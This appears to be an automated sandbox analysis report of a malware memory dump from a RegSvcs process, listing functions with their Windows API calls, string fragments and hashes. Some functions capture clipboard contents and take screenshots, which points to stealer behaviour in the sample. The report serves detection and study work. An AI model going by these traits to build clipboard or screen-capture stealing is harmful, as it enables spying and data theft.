Instruction ID: ce6842184c50d62c14bce23637ee5c5f438d7dfa952fd3edf86735d4080956a5
Opcode Fuzzy Hash: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
Instruction Fuzzy Hash: 4A81C33A158310EFD7489FB4AC49A3B7BA5FB8A352F050C3CF546D2290C73995168B2B

Function 004367F0 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 109clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00436804
GetClipboardData.USER32 ref: 0043681F
GlobalLock.KERNEL32 ref: 00436838
GetWindowLongW.USER32 ref: 0043689D
GlobalUnlock.KERNEL32 ref: 00436959
CloseClipboard.USER32 ref: 00436962

Strings

E, xrefs: 004368B3
@, xrefs: 004368EA
N, xrefs: 004368C2
O, xrefs: 004368CC
K, xrefs: 004368E5
F, xrefs: 004368E0
}, xrefs: 004368D1
C, xrefs: 004368B8
t, xrefs: 004368D6
{, xrefs: 004368BD
B, xrefs: 004368C7

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: @$B$C$E$F$K$N$O$t${$}
API String ID: 2832541153-984153585
Opcode ID: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
Instruction ID: d12379fae56aa42f0d26b1a9ba346e1c7749dd96ee15ae9ce42ccc61be201c2c
Opcode Fuzzy Hash: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
Instruction Fuzzy Hash: 65418FB050C3818ED301EF78D58931FBFE0AF96318F05492EE4C996292D67D8549CBAB

Function 00425100 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 480COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243

Strings

]RB, xrefs: 00425257
:@&F, xrefs: 00425393
+$e, xrefs: 004251F2
,X*^, xrefs: 004253A3
XY, xrefs: 00425146
+$e, xrefs: 00425165, 0042517A
1D6Z, xrefs: 0042539B
%\)R, xrefs: 004253AB
C`<f, xrefs: 004253D3
?P:V, xrefs: 004253B3
.T'j, xrefs: 004253BB

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
API String ID: 237503144-2846770461
Opcode ID: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
Instruction ID: b6d59b0557f70d7ec2d4011febfa6e18cf4a5b2df19338a98cc8181bc2575411
Opcode Fuzzy Hash: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
Instruction Fuzzy Hash: E7F1EDB4208350DFD310DF69E89166BBBE0FFC5314F54892DE5958B362E7B88906CB46

Function 00425D6A Relevance: 15.8, Strings: 12, Instructions: 778COMMON

Download Yara Rule

Strings

4D2Z, xrefs: 00426346
8I>K, xrefs: 00426858
T`Sf, xrefs: 0042638C
Wdz, xrefs: 00426396
&$, xrefs: 004266A0
(X#^, xrefs: 00426350
-T,j, xrefs: 0042636E
$@7F, xrefs: 0042633C
2E1G, xrefs: 00426876
+\1R, xrefs: 0042635A
uVw, xrefs: 00425EA0
qs, xrefs: 00425E96

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
API String ID: 0-2419925205
Opcode ID: dbc9d13701a6f1f84a1fbda366b061da39485b638189b278c3f43e1cc0e4d0b6
Instruction ID: c261d025133841230159ca5431fd9423a817dc7e9349410c690f11e8db15d26c
Opcode Fuzzy Hash: dbc9d13701a6f1f84a1fbda366b061da39485b638189b278c3f43e1cc0e4d0b6
Instruction Fuzzy Hash: FA7283B4A05269CFDB24CF55D881BDDBBB2FB46300F1181E9C5496B362DB349A86CF84

Function 00419840 Relevance: 14.9, APIs: 2, Strings: 6, Instructions: 936COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00419CE7
FreeLibrary.KERNEL32(?), ref: 00419D24

Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE

Strings

if, xrefs: 00419B1C
~|, xrefs: 00419B2E
vt, xrefs: 00419AFC
tj, xrefs: 00419BBA
SP, xrefs: 00419BF2
pv, xrefs: 00419BB2

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: ~|$SP$if$pv$tj$vt
API String ID: 764372645-1422159894
Opcode ID: e0b58ed5ff15dc801148dc9f86a9132d6192a83ea1caeaa00bd99fa001171b69
Instruction ID: c1c817f51924b2b6e01bbc71c3bfe870e6f9d21007064de5033cd7ab66586395
Opcode Fuzzy Hash: e0b58ed5ff15dc801148dc9f86a9132d6192a83ea1caeaa00bd99fa001171b69
Instruction Fuzzy Hash: 5D624770609310AFE724CB15DC9176BB7E2EFC5314F18862DF495973A1D378AC858B4A

Function 00417405 Relevance: 13.4, APIs: 4, Strings: 3, Instructions: 1110COMMON

Download Yara Rule

Strings

5&'d, xrefs: 004175E5
O, xrefs: 00417625
~, xrefs: 00418158

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 5&'d$O$~
API String ID: 0-1622812124
Opcode ID: 8b914b4801975b71dea4b75609ed348123c7e1e6468bc6ef1cacffb89bf502a6
Instruction ID: 7c8e188e2ff574dc84e1e58bec60109b2722ae2eee07efcef2931a8160e5a92b
Opcode Fuzzy Hash: 8b914b4801975b71dea4b75609ed348123c7e1e6468bc6ef1cacffb89bf502a6
Instruction Fuzzy Hash: AC820F7550C3518BC324CF28C8917ABB7E1FF99314F198A6EE4C99B391E7389941CB4A

Function 004257E0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 295COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004258F4
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042595D

Strings

B"@, xrefs: 00425818
)RSP, xrefs: 004259A1
rp, xrefs: 00425834
`J/H, xrefs: 00425826
=^"\, xrefs: 00425ABF

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: B"@$)RSP$=^"\$`J/H$rp
API String ID: 237503144-816972838
Opcode ID: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
Instruction ID: cd6e5e946c3164ee33c4da05371f075d598195140dbb1deecb8ac0c04a2143aa
Opcode Fuzzy Hash: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
Instruction Fuzzy Hash: 9DA110B6E402188FDB10CFA8DC827EEBBB1FF85314F154169E414AB291D7B59942CB94

Function 00415720 Relevance: 11.8, Strings: 8, Instructions: 1798COMMON

Download Yara Rule

Strings

BYQZ, xrefs: 00416286
F2}0, xrefs: 00415A76
DASS, xrefs: 0041629C
L, xrefs: 004162B2
NR@:, xrefs: 00416291
a, xrefs: 004163D3
R(RW, xrefs: 00416265
9?4<, xrefs: 00416345

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 9?4<$BYQZ$DASS$F2}0$L$NR@:$R(RW$a
API String ID: 0-3642574725
Opcode ID: 83579c757a543f9f659438346f364b36b2e078702eec510370abc902ff0d75f9
Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
Opcode Fuzzy Hash: 83579c757a543f9f659438346f364b36b2e078702eec510370abc902ff0d75f9
Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46

Function 0041C400 Relevance: 10.8, Strings: 8, Instructions: 842COMMON

Download Yara Rule

Strings

,\/b, xrefs: 0041C912
*H%N, xrefs: 0041C8EF
,X0^, xrefs: 0041C90B
C`6f, xrefs: 0041C73C, 0041CBB1, 0041CC7D
2T'Z, xrefs: 0041C904
4D"J, xrefs: 0041C8E8
+P%V, xrefs: 0041C8FD
C`6f, xrefs: 0041C919

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
API String ID: 0-102253164
Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5

Function 0040D545 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A

CoUninitialize.OLE32 ref: 0040D555

Strings

|qay, xrefs: 0040D641
~wxH, xrefs: 0040D64F
9Y, xrefs: 0040D854
&W-Q, xrefs: 0040D7B9
?C*], xrefs: 0040D7A4

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
String ID: &W-Q$9Y$?C*]$|qay$~wxH
API String ID: 3213364925-1959178137
Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95

Function 00425AF0 Relevance: 7.8, Strings: 6, Instructions: 289COMMON

Download Yara Rule

Strings

bX_^, xrefs: 00425BBD
)RSP, xrefs: 004259A1
B:, xrefs: 00425C36
C@, xrefs: 00425C40
K3, xrefs: 00425C4A
=^"\, xrefs: 00425ABF

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: )RSP$=^"\$B:$C@$K3$bX_^
API String ID: 0-3030200349
Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91

Function 0042EA62 Relevance: 5.3, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

4b, xrefs: 0042EDDA
0, xrefs: 0042ED00
8<j?, xrefs: 0042ED50
D, xrefs: 0042ED68

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 0$8<j?$D$4b
API String ID: 0-1320392364
Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A

Function 0041BBA0 Relevance: 5.3, Strings: 4, Instructions: 325COMMON

Download Yara Rule

Strings

WT, xrefs: 0041BD39
9HiN, xrefs: 0041BD21
'P0V, xrefs: 0041BD31
,D,J, xrefs: 0041BD19

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 'P0V$,D,J$9HiN$WT
API String ID: 0-3770969982
Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86

Function 0042EB5F Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

4b, xrefs: 0042EDDA
8<j?, xrefs: 0042ED50
D, xrefs: 0042ED68

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A

Function 0042EBB3 Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

4b, xrefs: 0042EDDA
8<j?, xrefs: 0042ED50
D, xrefs: 0042ED68

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A

Function 00408F90 Relevance: 4.1, Strings: 3, Instructions: 304COMMON

Download Yara Rule

Strings

ut, xrefs: 004090E1
Z, xrefs: 004090E8
#=0, xrefs: 00408FC5

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: #=0$Z$ut
API String ID: 0-1971374411
Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction ID: eba545bab416a68370d8833e2e81319f1cd74d48ef4740c2d23370f5f56f4d51
Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction Fuzzy Hash: 4681E23120C7829AD7058F39845026BBFE1AFA7314F1889AED4D1AB3C7D639C90AC756

Function 0042EBA1 Relevance: 4.0, Strings: 3, Instructions: 290COMMON

Download Yara Rule

Strings

4b, xrefs: 0042EDDA
8<j?, xrefs: 0042ED50
D, xrefs: 0042ED68

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A

Function 00442D20 Relevance: 4.0, Strings: 3, Instructions: 282COMMON

Download Yara Rule

Strings

NMNO, xrefs: 00442E20
bX_^, xrefs: 00442D22
D`a&, xrefs: 00442ED5

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: D`a&$NMNO$bX_^
API String ID: 2994545307-620122162
Opcode ID: d05b069c2774e5dca8c6c82d0cc5445501065ceaccfd0e13c7886a15adc59c0e
Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
Opcode Fuzzy Hash: d05b069c2774e5dca8c6c82d0cc5445501065ceaccfd0e13c7886a15adc59c0e
Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759

Function 00414C20 Relevance: 3.5, Strings: 2, Instructions: 989COMMON

Download Yara Rule

Strings

NP,?, xrefs: 00415070
UA, xrefs: 004155D4

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: NP,?$UA
API String ID: 0-2573221895
Opcode ID: 813f516fed63c72ca3bf17ef7764154db6e20e3e50629bbb0b438f72444d9df9
Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
Opcode Fuzzy Hash: 813f516fed63c72ca3bf17ef7764154db6e20e3e50629bbb0b438f72444d9df9
Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789

Function 0042B170 Relevance: 2.9, Strings: 2, Instructions: 428COMMON

Download Yara Rule

Strings

?;;, xrefs: 0042B3AA
{wBy, xrefs: 0042B538

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: {wBy$?;;
API String ID: 0-3800777323
Opcode ID: 0391eef4f66e27ec324ee0bdb208b3ba8a61a3bb00443cccaa8d3f35c85cd4d0
Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
Opcode Fuzzy Hash: 0391eef4f66e27ec324ee0bdb208b3ba8a61a3bb00443cccaa8d3f35c85cd4d0
Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A

Function 00427490 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

yr, xrefs: 004275CE
o~, xrefs: 004275E6

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: o~$yr
API String ID: 0-1013308823
Opcode ID: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
Instruction ID: 9949b5826033667454bdd212c251d03fc0b1eef30724b4879d74d6325ed2a79f
Opcode Fuzzy Hash: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
Instruction Fuzzy Hash: 48913975A0C3208BD320DF19D84066BBBE2EFD5324F09892DE9D95B391E7B8C905C786

Function 00428280 Relevance: 2.6, Strings: 2, Instructions: 70COMMON

Download Yara Rule

Strings

:7$%, xrefs: 00428375
:7$%, xrefs: 004282C5, 004282F6

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: :7$%$:7$%
API String ID: 0-2391988857
Opcode ID: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
Instruction ID: 0de6392d9aeb990522659998ecc2397938767f988235b0ae13ec08bed24327b9
Opcode Fuzzy Hash: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
Instruction Fuzzy Hash: BA21F1701093908BD7089B69C865B6FFBE4AB86318F105A2DE1D2872D1DBB48809CB82

Function 0044042D Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

7&'$, xrefs: 00440445
vA\, xrefs: 0044049C

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 7&'$$vA\
API String ID: 0-2621209329
Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction ID: 095e66cfb836127910944c44464487434cf5069dbd9256ca3ed79a62a3e9a21d
Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction Fuzzy Hash: 02F09C745145544BEB918F7C98996BF67F0F713214F302BB5C65AE32A2C634C8914F0C

Function 00422380 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

:;, xrefs: 004223AC

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: :;
API String ID: 0-3581617570
Opcode ID: 303de10fff242c4ff705677ea5eca08dca5e362961479335f7d5ab6b711b2e43
Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
Opcode Fuzzy Hash: 303de10fff242c4ff705677ea5eca08dca5e362961479335f7d5ab6b711b2e43
Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A

Function 0043C5A0 Relevance: 1.6, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0043C7C0

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 4292c81706fc5104aea80fe8ef179a1662a25d3dca60aede90bca8e2f2b4382c
Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
Opcode Fuzzy Hash: 4292c81706fc5104aea80fe8ef179a1662a25d3dca60aede90bca8e2f2b4382c
Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799

Function 0041BEE1 Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

'', xrefs: 0041C360, 0041C364

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: ''
API String ID: 0-694448769
Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A

Function 00416ED0 Relevance: 1.6, Strings: 1, Instructions: 330COMMON

Download Yara Rule

Strings

*+, xrefs: 00417069

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: *+
API String ID: 0-2181965719
Opcode ID: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
Instruction ID: a6a176cfa994aee3612649f895d437fda5b17e7ce8ddb12fb8ae0738439bb6c9
Opcode Fuzzy Hash: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
Instruction Fuzzy Hash: 0BB177B15093818BD7318F25C8917EBBBF1EF96314F18892DD4C98B391EB384446CB8A

Function 0040DFE2 Relevance: 1.6, Strings: 1, Instructions: 311COMMON

Download Yara Rule

Strings

UXY^, xrefs: 0040E295

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: UXY^
API String ID: 0-1486013802
Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction ID: d4a14a9f2c2f0854964ffc34a88a484fd9aac6a31bc7c6ca58301aeff22ad83a
Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction Fuzzy Hash: B79135B5504B418FD315CF2AC990622FBA2FF96300B188AACC0D24FB56C738E816CF95

Function 00442470 Relevance: 1.5, Strings: 1, Instructions: 294COMMON

Download Yara Rule

Strings

_\]R, xrefs: 00442490

Memory Dump Source

Source File: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: _\]R
API String ID: 2994545307-1576797437
Opcode ID: 40b2a5fcce8fbd99e35ebddbeea2a32485a095c58c85b1bcf33869944168392c
Instruction ID: 67d2bc21efa779ec1b2302c596d4d55850990720b38256b1c81cc65d81c9891d
